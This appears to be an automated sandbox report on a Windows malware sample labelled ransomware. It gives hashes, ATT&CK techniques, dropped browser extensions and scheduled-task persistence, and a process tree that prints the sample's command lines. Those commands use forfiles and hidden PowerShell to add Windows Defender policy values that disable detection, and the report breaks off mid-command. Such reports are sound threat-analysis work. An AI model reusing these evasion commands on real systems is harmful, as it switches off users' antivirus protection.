413c42a5547e336e370fc74d9ad0ced99cab7161fac4f713d0bd27bb454622ac

Analysis

max time kernel
142s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20/09/2024, 06:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
Size

6.7MB
MD5

6f1a1461f95d3de99d47f68b1da78513
SHA1

af4e0c845375a1f3206fc84225653a5d6a732109
SHA256

413c42a5547e336e370fc74d9ad0ced99cab7161fac4f713d0bd27bb454622ac
SHA512

4a759c451537f242687a342ec353a6e5d6b8f1d652f7e1706097a7b0be2dbbe7771a96223b15bb6d317c79add9b321c404f66f2e75bf5c93fafc74af4c4426cc
SSDEEP

98304:VTKb0nUegBAV7SEvurihfxZLR8moMy7WkBXjiD8LFV8ODkKOsPmnn751I37Uf:BKzegBAh2uBxWMy7nXmgvz+n7j2Uf

Score

8^/10

defense_evasion discovery execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1448	powershell.exe
3920	powershell.EXE

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe

Indirect Command Execution 1 TTPs 5 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
1696	forfiles.exe
3068	forfiles.exe
4356	forfiles.exe
4964	forfiles.exe
2536	forfiles.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbaddinigglahkekcppiongkmgmpahml\3.0.1_0\manifest.json	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\PBESNRhdmYKU2\MZAiiFwHbcuXo.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\RNnwulk.xml	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\fJZgEdoSEgzXC\nrUUdeu.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\fJZgEdoSEgzXC\AaKfJcZ.xml	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\OkFXZwGHSaUn\oLzXCXH.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\jAmSRiPKU\ZiFHcX.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\jAmSRiPKU\MIdCqfX.xml	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{24E81385-CAF7-4F8F-94F4-CF985F9FF409}.xpi	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{24E81385-CAF7-4F8F-94F4-CF985F9FF409}.xpi	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\PBESNRhdmYKU2\blkhMdE.xml	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\fNQxoCu.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\HxvKEihgfuYdkMf.job	schtasks.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3876	3624	WerFault.exe	81

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4204	schtasks.exe
1852	schtasks.exe
3556	schtasks.exe
4000	schtasks.exe
4016	schtasks.exe
2368	schtasks.exe
1444	schtasks.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
1448	powershell.exe
1448	powershell.exe
4204	powershell.exe
4204	powershell.exe
3876	powershell.exe
3876	powershell.exe
3920	powershell.EXE
3920	powershell.EXE
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	4204	powershell.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	3920	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3624 wrote to memory of 5084	3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	82
PID 3624 wrote to memory of 5084	3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	82
PID 3624 wrote to memory of 5084	3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	82
PID 5084 wrote to memory of 1696	5084	cmd.exe	84
PID 5084 wrote to memory of 1696	5084	cmd.exe	84
PID 5084 wrote to memory of 1696	5084	cmd.exe	84
PID 1696 wrote to memory of 1868	1696	forfiles.exe	85
PID 1696 wrote to memory of 1868	1696	forfiles.exe	85
PID 1696 wrote to memory of 1868	1696	forfiles.exe	85
PID 1868 wrote to memory of 2688	1868	cmd.exe	86
PID 1868 wrote to memory of 2688	1868	cmd.exe	86
PID 1868 wrote to memory of 2688	1868	cmd.exe	86
PID 5084 wrote to memory of 3068	5084	cmd.exe	87
PID 5084 wrote to memory of 3068	5084	cmd.exe	87
PID 5084 wrote to memory of 3068	5084	cmd.exe	87
PID 3068 wrote to memory of 4016	3068	forfiles.exe	88
PID 3068 wrote to memory of 4016	3068	forfiles.exe	88
PID 3068 wrote to memory of 4016	3068	forfiles.exe	88
PID 4016 wrote to memory of 2440	4016	cmd.exe	89
PID 4016 wrote to memory of 2440	4016	cmd.exe	89
PID 4016 wrote to memory of 2440	4016	cmd.exe	89
PID 5084 wrote to memory of 4356	5084	cmd.exe	90
PID 5084 wrote to memory of 4356	5084	cmd.exe	90
PID 5084 wrote to memory of 4356	5084	cmd.exe	90
PID 4356 wrote to memory of 1820	4356	forfiles.exe	91
PID 4356 wrote to memory of 1820	4356	forfiles.exe	91
PID 4356 wrote to memory of 1820	4356	forfiles.exe	91
PID 1820 wrote to memory of 3548	1820	cmd.exe	92
PID 1820 wrote to memory of 3548	1820	cmd.exe	92
PID 1820 wrote to memory of 3548	1820	cmd.exe	92
PID 5084 wrote to memory of 4964	5084	cmd.exe	93
PID 5084 wrote to memory of 4964	5084	cmd.exe	93
PID 5084 wrote to memory of 4964	5084	cmd.exe	93
PID 4964 wrote to memory of 4264	4964	forfiles.exe	94
PID 4964 wrote to memory of 4264	4964	forfiles.exe	94
PID 4964 wrote to memory of 4264	4964	forfiles.exe	94
PID 4264 wrote to memory of 2636	4264	cmd.exe	95
PID 4264 wrote to memory of 2636	4264	cmd.exe	95
PID 4264 wrote to memory of 2636	4264	cmd.exe	95
PID 5084 wrote to memory of 2536	5084	cmd.exe	96
PID 5084 wrote to memory of 2536	5084	cmd.exe	96
PID 5084 wrote to memory of 2536	5084	cmd.exe	96
PID 2536 wrote to memory of 4776	2536	forfiles.exe	97
PID 2536 wrote to memory of 4776	2536	forfiles.exe	97
PID 2536 wrote to memory of 4776	2536	forfiles.exe	97
PID 4776 wrote to memory of 1448	4776	cmd.exe	98
PID 4776 wrote to memory of 1448	4776	cmd.exe	98
PID 4776 wrote to memory of 1448	4776	cmd.exe	98
PID 1448 wrote to memory of 2204	1448	powershell.exe	101
PID 1448 wrote to memory of 2204	1448	powershell.exe	101
PID 1448 wrote to memory of 2204	1448	powershell.exe	101
PID 3624 wrote to memory of 4204	3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	105
PID 3624 wrote to memory of 4204	3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	105
PID 3624 wrote to memory of 4204	3624	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	105
PID 4204 wrote to memory of 716	4204	powershell.exe	107
PID 4204 wrote to memory of 716	4204	powershell.exe	107
PID 4204 wrote to memory of 716	4204	powershell.exe	107
PID 716 wrote to memory of 2792	716	cmd.exe	109
PID 716 wrote to memory of 2792	716	cmd.exe	109
PID 716 wrote to memory of 2792	716	cmd.exe	109
PID 4204 wrote to memory of 2704	4204	powershell.exe	110
PID 4204 wrote to memory of 2704	4204	powershell.exe	110
PID 4204 wrote to memory of 2704	4204	powershell.exe	110
PID 4204 wrote to memory of 1464	4204	powershell.exe	111

C:\Users\Admin\AppData\Local\Temp\202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1696
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1868
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2688
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3068
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4016
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2440
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:4356
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1820
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3548
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4264
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2636
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:2536
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4776
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1448
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:2204
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG 